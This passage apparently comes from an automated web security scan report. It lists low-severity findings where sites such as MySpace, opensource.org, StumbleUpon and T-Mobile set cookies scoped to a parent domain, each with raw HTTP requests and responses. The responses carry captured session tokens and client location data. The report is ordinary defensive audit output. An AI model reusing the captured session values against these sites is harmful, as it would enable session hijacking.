Set-Cookie: CHKIO=; domain=.diigo.com; path=/; expires=Fri, 21 Jan 2011 09:14:38 GMT
Set-Cookie: diigoandlogincookie=; domain=.diigo.com; path=/; expires=Fri, 21 Jan 2011 09:14:38 GMT
Set-Cookie: _smasher_session=cdc373a2e1ecd61c7b92bca1b0e323d3; domain=diigo.com; path=/
Cache-Control: no-cache

<html><body>You are being <a href="https://secure.diigo.com/sign-in?referInfo=http%3A%2F%2Fwww.diigo.com%2Fpost">redirected</a>.</body></html>

13.29. http://www.directstartv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
  • Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
  • Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
  • EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
  • VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
  • VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
  • lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Mon, 23-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13.30. https://www.isc.org/software/inn

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.isc.org
Path:   /software/inn

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:03:30 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8k DAV/2 PHP/5.2.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.12
Set-Cookie: SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:03:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

13.31. http://www.metacafe.com/fplayer/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
  • OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
  • OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
  • User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

13.32. http://www.myspace.com/Modules/PostTo/Pages/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • SessionDDF2=2xXsSLB0L/Krw+qh8vhTHCxfMhyIHxzrYDO28EaiUBPQMUu1i3A6r1xa3arh/mC2nMPd7rwv4zTXGXj6+HLj9g==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:55 GMT; path=/
  • MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988150464779&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:55 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: e33e7134e948ea36efc91ee918fd1313dbac0906ff7c9eb7
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988150464779&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:55 GMT; path=/
Set-Cookie: SessionDDF2=2xXsSLB0L/Krw+qh8vhTHCxfMhyIHxzrYDO28EaiUBPQMUu1i3A6r1xa3arh/mC2nMPd7rwv4zTXGXj6+HLj9g==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:55 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Keebler Elves
Date: Tue, 25 Jan 2011 04:46:54 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

13.33. http://www.myspace.com/netlingo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /netlingo

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
  • MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-Server: 53fa252345a87b39ff47aafb4ed7b2849b482ff947909977
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634314988124700820&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Tue, 01-Feb-2011 04:46:52 GMT; path=/
Set-Cookie: SessionDDF2=IHTN/IBoYERycvsTA4ECVPeqWgVgcluvK1Z4IiOTaL2hfgaqs8vsgeImvs/aMpMVsmPVoHOAflPeo6+ygc0HVA==; domain=.myspace.com; expires=Sat, 25-Jan-2031 04:46:52 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Chunk from Goonies
Date: Tue, 25 Jan 2011 04:46:51 GMT
Content-Length: 29349
X-Vertical: profileidentities


<!DOCTYPE html>
<html class="noJS en-US">
   <!-- UserViewProfile -->
<head><meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>
   NetLingo on Myspace
</title>
       <script type="text/ja
...[SNIP]...

13.34. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/blog/ebay-use-joomla-open-source-glue HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:03:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931833340495; path=/; expires=Thu, 24-Jan-13 05:03:53 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com
Content-Length: 95231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...

13.35. http://www.opensource.org/licenses/bsd-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/bsd-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:58 GMT
ETag: "7de37e433f136f70754431d33998090d"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.36. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.37. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:42 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:06 GMT
ETag: "ecf056aef437e96f0aaa9888d3f21414"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.38. http://www.packtpub.com/award

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.packtpub.com
Path:   /award

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • SESS93d7a233ed897d918b53457b98164e93=fpu3r74605hmvi8pofbnt04583; expires=Tue, 25-Jan-2011 15:15:08 GMT; path=/; domain=.packtpub.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /award HTTP/1.1
Host: www.packtpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 15:15:08 GMT
Server: Apache
Set-Cookie: SESS93d7a233ed897d918b53457b98164e93=fpu3r74605hmvi8pofbnt04583; expires=Tue, 25-Jan-2011 15:15:08 GMT; path=/; domain=.packtpub.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:15:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://www.packtpub.com/open-source-awards-home
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8
Connection: close



13.39. http://www.stumbleupon.com/submit

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • PHPSESSID=et4p0cs6c4ufsh9057l6j77nm3; path=/; domain=.stumbleupon.com; HttpOnly
  • cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
  • cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
  • cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
  • su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=et4p0cs6c4ufsh9057l6j77nm3; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Tue, 25 Jan 2011 04:38:36 GMT
X-Varnish: 2659461572
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...

13.40. http://www.t-mobile.com/Company/Community.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.t-mobile.com
Path:   /Company/Community.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
  • TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
  • TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
  • PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Company/Community.aspx?tp=Abt_Tab_HandsetRecycling HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=chnwja451k35xk453rmski55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:38:47 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 25 Jan 2011 04:38:47 GMT
Connection: close
Content-Length: 41256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...

13.41. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • ANON_ID=alnYSwtZdPuoP7SpJnHoOn6TC7uVaZblA87K1ygX0f1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgTx2pGMLGTUxSpnpnuGgneS4uRH3F5UIxyV2vItfFS4p24eqKnVPrweM91kBCNbZaOJZcDFjxos4ePmdX9ScRZcCH4xkEGVN30HIh9PAFi7B076lbqqZbZdvgymSbR4XnZaYtW7YU66NirjJYfbFR3Zd1VIDlOQtDHUTykSEIT; path=/; domain=.tribalfusion.com; expires=Mon, 25-Apr-2011 01:35:47 GMT;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=345683&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aDnW0LrwZayOnXwr1QHr2jw47YFSRv4Za7XcQkGtYZdRZcWf7wADFEVHJyPbI34C71hPcXHKqC4rKUR10ZauE2JtrnsNVwlCTDlBxKRo78YQefyFwV2spqhEjwpgWtMSLxFV7yjY44B29vthYSxQDZdm0Y0mEGGuq3vvM6sZbWWCBS9ygvc7XVZbdDZaekm5Kmxbh5WlcNUFZa1fiHcrP5N16q6mbZarKtmZagM8Uv3qPGsepQSrfNK9vOubwfVB3hYbZbKmqUUdsYdVgLIeb

Response

HTTP/1.1 302 Moved Temporarily
